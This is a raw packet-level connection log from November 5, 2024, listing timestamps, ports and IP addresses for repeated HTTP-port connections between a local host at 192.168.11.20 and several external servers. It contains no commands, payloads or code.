                                                                                                              Nov 5, 2024 15:37:28.813224077 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:28.821978092 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:28.939783096 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149008989 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149110079 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149153948 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149194956 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149236917 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149277925 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149399042 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149396896 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149403095 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149566889 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149611950 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149616957 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.149739027 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.149908066 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267188072 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267251968 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267323971 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267366886 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267405987 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267447948 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267488003 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267529964 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267570019 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267601013 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267602921 CET804979166.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:29.267601013 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267780066 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:29.267935038 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:30.333250046 CET4979180192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.350759029 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.470257998 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.470443010 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.478069067 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.595494986 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809813976 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809847116 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809855938 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809863091 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809870958 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809915066 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809936047 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809943914 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809967041 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.809973955 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.810087919 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.810144901 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:31.932573080 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932672977 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932682991 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932689905 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932724953 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932733059 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932801962 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932832956 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932842970 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.932849884 CET804979266.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:31.933135986 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:32.988931894 CET4979280192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.006364107 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.123939037 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.124113083 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.131946087 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.131995916 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.132045031 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.249459982 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.249545097 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.249551058 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.249721050 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.472951889 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.472965956 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.472973108 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473000050 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473031998 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473057032 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473088980 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473095894 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473103046 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473109961 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.473216057 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.473273993 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.590735912 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590745926 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590843916 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590853930 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590861082 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590888977 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590897083 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590903997 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590982914 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.590991974 CET804979366.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:34.591075897 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.591075897 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:34.591172934 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:35.644619942 CET4979380192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:36.662065983 CET4979480192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:36.780025959 CET804979466.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:36.780286074 CET4979480192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:36.785660982 CET4979480192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:36.903455973 CET804979466.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:37.051381111 CET804979466.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:37.051449060 CET804979466.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:37.051748037 CET4979480192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:37.053734064 CET4979480192.168.11.2066.198.240.15
                                                                                                              Nov 5, 2024 15:37:37.171536922 CET804979466.198.240.15192.168.11.20
                                                                                                              Nov 5, 2024 15:37:42.067224026 CET4979580192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:42.174964905 CET80497953.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:42.175268888 CET4979580192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:42.183583021 CET4979580192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:42.291238070 CET80497953.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:43.210342884 CET80497953.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:43.210515976 CET4979580192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:43.689759970 CET4979580192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:43.797364950 CET80497953.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:44.707206011 CET4979680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:44.815188885 CET80497963.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:44.815345049 CET4979680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:44.823009014 CET4979680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:44.930658102 CET80497963.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:44.932305098 CET80497963.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:44.932497025 CET4979680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:46.329757929 CET4979680192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:46.437691927 CET80497963.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.347202063 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:47.454839945 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.455027103 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:47.462866068 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:47.462914944 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:47.462968111 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:47.570569038 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.570667982 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.570673943 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.570780993 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.570786953 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.571110964 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:47.571116924 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:48.476710081 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:48.476833105 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:48.969907045 CET4979780192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:49.077893019 CET80497973.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:49.987304926 CET4979880192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:50.097775936 CET80497983.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:50.097958088 CET4979880192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:50.102979898 CET4979880192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:50.212452888 CET80497983.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:50.213927031 CET80497983.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:50.213934898 CET80497983.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:50.214337111 CET4979880192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:50.216623068 CET4979880192.168.11.203.33.130.190
                                                                                                              Nov 5, 2024 15:37:50.325927019 CET80497983.33.130.190192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.220566034 CET4979980192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:55.406965971 CET8049799161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.407273054 CET4979980192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:55.414917946 CET4979980192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:55.601948977 CET8049799161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.602787971 CET8049799161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.602796078 CET8049799161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.602818966 CET8049799161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:55.603117943 CET4979980192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:56.921309948 CET4979980192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:57.938671112 CET4980080192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:58.127543926 CET8049800161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:58.127712011 CET4980080192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:58.136048079 CET4980080192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:58.324141026 CET8049800161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:58.325383902 CET8049800161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:58.325428009 CET8049800161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:58.325460911 CET8049800161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:37:58.325731993 CET4980080192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:37:59.639475107 CET4980080192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:00.656836033 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:00.843924046 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:00.844103098 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:00.851941109 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:00.851991892 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:00.852045059 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:01.038992882 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.040896893 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.040944099 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.040993929 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.041023016 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.041049957 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.041079998 CET8049801161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:01.041140079 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:01.041196108 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:02.357532978 CET4980180192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.374999046 CET4980280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.562990904 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:03.563189983 CET4980280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.568806887 CET4980280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.759452105 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:03.760319948 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:03.760343075 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:03.760349989 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:03.760675907 CET4980280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.763783932 CET4980280192.168.11.20161.97.142.144
                                                                                                              Nov 5, 2024 15:38:03.951874971 CET8049802161.97.142.144192.168.11.20
                                                                                                              Nov 5, 2024 15:38:08.781491041 CET4980380192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:09.218926907 CET8049803119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:09.219140053 CET4980380192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:09.226814032 CET4980380192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:09.671473026 CET8049803119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:09.699775934 CET8049803119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:09.702735901 CET8049803119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:09.702924967 CET4980380192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:10.730756998 CET4980380192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:11.748354912 CET4980480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:12.171585083 CET8049804119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:12.171739101 CET4980480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:12.179430962 CET4980480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:12.613404989 CET8049804119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:12.661990881 CET8049804119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:12.662034988 CET8049804119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:12.662197113 CET4980480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:13.683233023 CET4980480192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:14.700684071 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:15.138407946 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.138674021 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:15.146502972 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:15.146568060 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:15.552236080 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.573780060 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.573791027 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.573805094 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.584599972 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.603473902 CET8049805119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:15.603651047 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:16.651321888 CET4980580192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:17.668783903 CET4980680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:18.121607065 CET8049806119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:18.121903896 CET4980680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:18.127055883 CET4980680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:18.559819937 CET8049806119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:18.595443964 CET8049806119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:18.595501900 CET8049806119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:18.595736980 CET4980680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:18.597564936 CET4980680192.168.11.20119.18.54.27
                                                                                                              Nov 5, 2024 15:38:19.025139093 CET8049806119.18.54.27192.168.11.20
                                                                                                              Nov 5, 2024 15:38:31.775228024 CET4980780192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:31.986773968 CET8049807195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:31.987024069 CET4980780192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:31.995176077 CET4980780192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:32.210241079 CET8049807195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:32.210288048 CET8049807195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:32.210323095 CET8049807195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:32.210486889 CET4980780192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:33.506975889 CET4980780192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:34.524427891 CET4980880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:34.745831966 CET8049808195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:34.746094942 CET4980880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:34.753774881 CET4980880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:34.973167896 CET8049808195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:34.973217010 CET8049808195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:34.973251104 CET8049808195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:34.973478079 CET4980880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:36.256434917 CET4980880192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:37.273880005 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:37.483761072 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.484122992 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:37.492533922 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:37.700716972 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700735092 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700746059 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700756073 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700767040 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.700778961 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704250097 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704279900 CET8049809195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:37.704461098 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:39.005850077 CET4980980192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.023344994 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.220012903 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.220355988 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.225492954 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.431312084 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483453989 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483504057 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:40.483769894 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.485595942 CET4981080192.168.11.20195.110.124.133
                                                                                                              Nov 5, 2024 15:38:40.683058977 CET8049810195.110.124.133192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.490988970 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.670212984 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.670469999 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.678103924 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:45.856096029 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871273994 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871320963 CET8049811203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:45.871561050 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:47.191524982 CET4981180192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.208937883 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.384895086 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.385193110 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.392868996 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:48.569284916 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576363087 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576443911 CET8049812203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:48.576606989 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:49.894114971 CET4981280192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:50.911525011 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.089315891 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.089576006 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.098264933 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.098340034 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:51.276853085 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276973009 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276988029 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.276997089 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.277017117 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290591955 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290607929 CET8049813203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:51.290785074 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:52.612345934 CET4981380192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.631563902 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.810650110 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:53.810973883 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.816171885 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:53.994154930 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:54.002469063 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:54.002515078 CET8049814203.161.41.204192.168.11.20
